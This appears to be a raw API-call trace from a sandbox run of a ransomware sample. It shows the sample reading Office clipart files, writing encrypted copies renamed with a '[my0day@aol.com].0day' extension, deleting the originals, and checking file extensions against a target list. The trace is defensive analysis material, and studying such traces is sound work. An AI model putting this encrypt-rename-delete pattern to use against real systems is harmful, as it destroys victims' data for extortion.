CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0269.593] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.593] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0269.594] GetLastError () returned 0x0 [0269.594] ReadFile (in: hFile=0x2c4, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0xec4, lpOverlapped=0x0) returned 1 [0269.596] WriteFile (in: hFile=0x380, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xed0, lpOverlapped=0x0) returned 1 [0269.597] ReadFile (in: hFile=0x2c4, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.597] WriteFile (in: hFile=0x380, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.597] SetEndOfFile (hFile=0x380) returned 1 [0269.597] CloseHandle (hObject=0x380) returned 1 [0269.597] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.597] SetEndOfFile (hFile=0x2c4) returned 1 [0269.600] CloseHandle (hObject=0x2c4) returned 1 [0269.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0269.600] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf")) returned 1 [0269.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0269.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0269.601] lstrlenW (lpString=".doc") returned 4 [0269.601] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.601] lstrlenW (lpString=".docx") returned 5 [0269.601] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.601] lstrlenW (lpString=".pdf") returned 4 [0269.601] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.601] lstrlenW (lpString=".xls") returned 4 [0269.601] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.601] lstrlenW (lpString=".xlsx") returned 5 [0269.601] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.601] lstrlenW (lpString=".ppt") returned 4 [0269.601] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0269.601] lstrlenW (lpString=".zip") returned 4 [0269.601] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.601] lstrlenW (lpString=".rar") returned 4 [0269.601] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.601] lstrlenW (lpString=".bz2") returned 4 [0269.601] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.601] lstrlenW (lpString=".7z") returned 3 [0269.601] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0269.601] lstrlenW (lpString=".dbf") returned 4 [0269.601] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0269.601] lstrlenW (lpString=".1cd") returned 4 [0269.601] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0269.602] lstrlenW (lpString=".jpg") returned 4 [0269.602] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0269.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0269.602] lstrlenW (lpString=".doc") returned 4 [0269.602] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0269.602] lstrlenW (lpString=".docx") returned 5 [0269.602] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0269.602] lstrlenW (lpString=".pdf") returned 4 [0269.602] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0269.602] lstrlenW (lpString=".xls") returned 4 [0269.602] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0269.602] lstrlenW (lpString=".xlsx") returned 5 [0269.602] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0269.602] lstrlenW (lpString=".ppt") returned 4 [0269.602] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0269.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0269.602] lstrlenW (lpString=".zip") returned 4 [0269.602] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0269.602] lstrlenW (lpString=".rar") returned 4 [0269.602] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0269.602] lstrlenW (lpString=".bz2") returned 4 [0269.602] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0269.602] lstrlenW (lpString=".7z") returned 3 [0269.602] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0269.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0269.603] lstrlenW (lpString=".dbf") returned 4 [0269.603] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0269.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0269.603] lstrlenW (lpString=".1cd") returned 4 [0269.603] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0269.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0269.603] lstrlenW (lpString=".jpg") returned 4 [0269.603] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0269.603] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0269.603] lstrlenW (lpString="BL00274_.WMF") returned 12 [0269.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0269.603] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=4164) returned 1 [0269.603] CloseHandle (hObject=0x2c4) returned 1 [0269.603] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf")) returned 0x20 [0269.604] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0269.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0269.604] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.604] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0269.604] GetLastError () returned 0x0 [0269.605] ReadFile (in: hFile=0x2c4, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x1044, lpOverlapped=0x0) returned 1 [0269.606] WriteFile (in: hFile=0x380, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x1050, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x1050, lpOverlapped=0x0) returned 1 [0269.784] ReadFile (in: hFile=0x2c4, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.784] WriteFile (in: hFile=0x380, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.805] SetEndOfFile (hFile=0x380) returned 1 [0270.062] CloseHandle (hObject=0x380) returned 1 [0270.217] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.217] SetEndOfFile (hFile=0x2c4) returned 1 [0270.419] CloseHandle (hObject=0x2c4) returned 1 [0270.419] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.574] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf")) returned 1 [0270.599] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0270.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0270.600] lstrlenW (lpString=".doc") returned 4 [0270.600] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.600] lstrlenW (lpString=".docx") returned 5 [0270.600] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.600] lstrlenW (lpString=".pdf") returned 4 [0270.600] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.600] lstrlenW (lpString=".xls") returned 4 [0270.600] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.600] lstrlenW (lpString=".xlsx") returned 5 [0270.600] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.600] lstrlenW (lpString=".ppt") returned 4 [0270.600] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0270.600] lstrlenW (lpString=".zip") returned 4 [0270.600] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.600] lstrlenW (lpString=".rar") returned 4 [0270.600] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.600] lstrlenW (lpString=".bz2") returned 4 [0270.600] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.600] lstrlenW (lpString=".7z") returned 3 [0270.600] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0270.600] lstrlenW (lpString=".dbf") returned 4 [0270.600] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0270.600] lstrlenW (lpString=".1cd") returned 4 [0270.600] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0270.600] lstrlenW (lpString=".jpg") returned 4 [0270.600] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0270.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0270.601] lstrlenW (lpString=".doc") returned 4 [0270.601] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.601] lstrlenW (lpString=".docx") returned 5 [0270.601] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.601] lstrlenW (lpString=".pdf") returned 4 [0270.601] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.601] lstrlenW (lpString=".xls") returned 4 [0270.601] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.601] lstrlenW (lpString=".xlsx") returned 5 [0270.601] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.601] lstrlenW (lpString=".ppt") returned 4 [0270.601] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0270.601] lstrlenW (lpString=".zip") returned 4 [0270.601] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.601] lstrlenW (lpString=".rar") returned 4 [0270.601] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.601] lstrlenW (lpString=".bz2") returned 4 [0270.601] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.601] lstrlenW (lpString=".7z") returned 3 [0270.601] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0270.601] lstrlenW (lpString=".dbf") returned 4 [0270.601] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0270.601] lstrlenW (lpString=".1cd") returned 4 [0270.601] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 63 [0270.601] lstrlenW (lpString=".jpg") returned 4 [0270.601] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.602] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.602] lstrlenW (lpString="BOATINST.WMF") returned 12 [0270.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.688] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=29004) returned 1 [0270.688] CloseHandle (hObject=0x380) returned 1 [0270.689] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf")) returned 0x20 [0270.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0270.742] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.742] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.753] GetLastError () returned 0x0 [0270.753] ReadFile (in: hFile=0x2cc, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x714c, lpOverlapped=0x0) returned 1 [0270.756] WriteFile (in: hFile=0x380, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x7150, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x7150, lpOverlapped=0x0) returned 1 [0270.757] ReadFile (in: hFile=0x2cc, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0270.757] WriteFile (in: hFile=0x380, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.757] SetEndOfFile (hFile=0x380) returned 1 [0270.757] CloseHandle (hObject=0x380) returned 1 [0270.757] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0270.757] SetEndOfFile (hFile=0x2cc) returned 1 [0270.760] CloseHandle (hObject=0x2cc) returned 1 [0270.760] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.766] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf")) returned 1 [0270.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0270.768] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0270.768] lstrlenW (lpString=".doc") returned 4 [0270.768] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.768] lstrlenW (lpString=".docx") returned 5 [0270.768] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0270.768] lstrlenW (lpString=".pdf") returned 4 [0270.768] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.768] lstrlenW (lpString=".xls") returned 4 [0270.768] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.768] lstrlenW (lpString=".xlsx") returned 5 [0270.768] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0270.769] lstrlenW (lpString=".ppt") returned 4 [0270.769] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0270.769] lstrlenW (lpString=".zip") returned 4 [0270.769] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.769] lstrlenW (lpString=".rar") returned 4 [0270.769] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.769] lstrlenW (lpString=".bz2") returned 4 [0270.769] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.769] lstrlenW (lpString=".7z") returned 3 [0270.769] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0270.769] lstrlenW (lpString=".dbf") returned 4 [0270.769] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0270.769] lstrlenW (lpString=".1cd") returned 4 [0270.769] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0270.769] lstrlenW (lpString=".jpg") returned 4 [0270.769] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0270.769] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0270.769] lstrlenW (lpString=".doc") returned 4 [0270.769] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.769] lstrlenW (lpString=".docx") returned 5 [0270.769] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0270.769] lstrlenW (lpString=".pdf") returned 4 [0270.769] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.769] lstrlenW (lpString=".xls") returned 4 [0270.770] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.770] lstrlenW (lpString=".xlsx") returned 5 [0270.770] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0270.770] lstrlenW (lpString=".ppt") returned 4 [0270.770] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0270.770] lstrlenW (lpString=".zip") returned 4 [0270.770] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.770] lstrlenW (lpString=".rar") returned 4 [0270.770] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.770] lstrlenW (lpString=".bz2") returned 4 [0270.770] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.770] lstrlenW (lpString=".7z") returned 3 [0270.770] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0270.770] lstrlenW (lpString=".dbf") returned 4 [0270.770] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0270.770] lstrlenW (lpString=".1cd") returned 4 [0270.770] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned 63 [0270.770] lstrlenW (lpString=".jpg") returned 4 [0270.770] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.770] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.770] lstrlenW (lpString="BS00145_.WMF") returned 12 [0270.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0271.008] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=1712) returned 1 [0271.008] CloseHandle (hObject=0x384) returned 1 [0271.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf")) returned 0x20 [0271.008] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0271.161] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.161] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 